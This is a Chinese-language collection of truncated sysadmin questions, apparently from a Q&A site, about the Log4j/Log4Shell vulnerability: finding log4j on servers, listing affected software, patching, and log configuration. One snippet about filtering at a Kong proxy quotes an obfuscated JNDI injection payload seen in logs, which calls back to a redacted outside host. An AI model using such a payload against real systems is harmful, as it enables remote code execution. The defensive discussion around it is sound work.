我不是 IT 或 Apache 专家,但我使用 Linux 多年。我已尽最大努力强化/保护我的在线服务器,该服务器用于需要提供其内容等的移动应用程序。 我注意到今天有人试图使用wget和攻击我的 Apache 2.4.57 服务器(显然?) log4j。我没有tomcat,只是简单地httpd运行php。 这是一条日志条目。(我已将日志条目中的 IP 地址信息更改为 XXXX。还请注意状态 200 返回代码,这意味着它成功了: [Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 1...
我的漏洞扫描程序最近在我们最近部署的 MS SQL 版本 (SQL 2019) 中标记了 Apache Log4j 不受支持的安装。这导致了两个我必须解决的高优先级发现。具体来说,似乎与文件 log4j-1.2.17.jar 有关。 显然,这里有一个 2.17.1 版本可用: https://logging.apache.org/log4j/2.x/download.html 不幸的是,我不知道如何使用它。没有安装程序,只有一堆文件。同一个网站上有一部分文章似乎是针对开发人员如何使用 Apache2(这似乎就是这个文件集合的实际用途),但我不是开发人员,只...
所以我最近收到一封邮件,要求将安装在我服务器上的 Apache 软件更新到最新的安全更新(与 Apache Log4j 相关的漏洞 (CVE-2021-44228 和 CVE-2021-45046)),但是我如何才能检测出这个log4j在哪里使用呢? 当我运行 cmd: 时java --version我得到: 然后我找到了一个 github log4j 脚本检查器:./wget.exe https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/lo ...
我安装了支持 log4j2 的 Kafka 3.0 预览版(http://home.apache.org/~dongjin/post/apache-kafka-log4j2-support/) 在 RHEL 8 服务器上。Kafka 和 Zookeeper 作为 systemd 用户服务成功运行。我KAFKA_LOG4J_OPTS="-Dlog4j.configurationFile=file:/home/username/kafka/bin/../config/log4j2.properties"在 systemd 单元文件中设置了环境变量,以便使用 lo...
我找不到任何有关特定 JRE 版本是否受到影响的信息?我的 Windows Server 2012 上的应用程序使用 JRE 1.8.0.x (1.8.0_91),但不确定它是否使用 Log4j 日志服务。有人能帮忙澄清一下吗,因为奇怪的是,我找不到任何人解释这一点。非常感谢!! ...
我有一台 Windows Server 2012 R2 机器。搜索 log4j 的最佳方法是什么。简单的文件搜索就足够了吗?或者这些文件是否可以在容器内部使用。我在 power shell 中进行了这样的文件搜索 Get-childitem -Path c:\ -Include log4j*.jar -File -Recurse -ErrorAction SilentlyContinue | select Lastwritetime, directory, name | export-csv -append -notypeinformation c.csv ...
我在 Linux 上运行 PowerDNS。看来 PowerDNS 容易受到新的 log4j 漏洞攻击。有什么方法可以禁用 Log4j 吗?根据我的研究,似乎可以将日志记录方法更改为 syslog,但我不太清楚如何做到这一点。 ...
是否存在可能受此影响的软件列表?Apache Log4jshell脆弱性(CVE-2021-44228) 是上周五宣布的吗? 对于管理多台服务器并运行大量不同软件的人来说,最好有一个可能受影响的软件列表。不需要包含版本的详细信息,只要包含受影响版本的任何内容,甚至包含受影响版本的任何内容即可可能被影响。 首先列出清单: 阿帕奇Solr 阿帕奇 Tomcat Apache Struts Apache Druid Apache Flink 阿帕奇·斯威夫特 Elasticsearch ...
试图了解更多关于最近发现的0 日漏洞 这是我发现的受影响软件的列表 ->https://github.com/NCSC-NL/log4shell/tree/main/software 仅在 F5 的注释中提到了 nginx。 如果我使用带有 nginx 的 Ubuntu 服务器通过互联网提供文件服务,我需要担心吗? ...
我读过有关 Log4j 的安全漏洞。 如何检查我的服务器上是否安装了 Log4j?我的具体服务器使用Ubuntu 18.04.6 LTS。 我已经安装了许多第三方软件包,其中可能有一些包含它。 是否有一个命令可以在我的服务器上运行来检查 Log4j 是否已安装? ...
我正在使用香港反向代理代理我的 Web 服务器的每个 HTTP 请求。我想缓解当前的 log4j 问题 ("log4shell通过查找并替换关键攻击者的字符串(如“jndi”),我能够轻松找到问题根源。例如,我在日志中发现了以下内容: ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback} 我认为这可以通过使用请求转换器插件。有人已经这样做了吗? PS:仅仅jndi用 来替换disabled太过深远而且会破坏很多东西。 ...
我目前使用 Java 中的 log4j 库将日志发布到 syslog,但这些日志始终显示主机名“localhost”,而不是设备的实际名称。只有当我从 Java 程序发送日志时才会发生这种情况。如果我使用 logger 将日志发送到 syslog,它们会显示正确的 FQDN。这是我的模板: $template myFormat, "%TIMESTAMP:::date-rfc3339% %HOSTNAME% %msg%\n" $ActionFileDefaultTemplate myFormat 我也使用过$PreserveFQDN on并尝试过将模板中...
在 Tomcat 上运行的应用程序正在使用 log4j,由于某些未知原因,它会在日志文件中间的某个地方(随机)附加新的日志行 log4j.properites 看起来像: log4j.rootLogger=INFO, CATALINA log4j.appender.CATALINA=org.apache.log4j.rolling.RollingFileAppender log4j.appender.CATALINA.RollingPolicy=org.apache.log4j.rolling.TimeBasedRollingPolicy log4j.a...
我找到了一个使用 log4j 从 tomcat 记录到 syslog 的教程: https://www.badllama.com/content/tomcat-7-logging-syslog-log4j 遗憾的是,这在 tomcat 8.5 中不再起作用。如评论所述文档. 已删除对 log4j 的支持。 还有其他方法可以记录到系统日志吗? ...
我们有一个 Java 应用程序,它使用 log4j 并每天轮换自己的日志: 当前使用的日志文件是/var/log/foo/foo.log /var/log/foo/foo.log.YYYY-MM-dd当日子改变时它就被移入 我们不想改变它的配置... 然而,我们确实希望: 重命名文件后对其进行压缩 只保留一定数量 虽然编写一个 cron-job 来同时完成这两项任务并不困难,但我们宁愿留在框架中logrotate... 我创建了以下内容/etc/logrotate.d/foo: /var/log/foo/foo.log.* { ...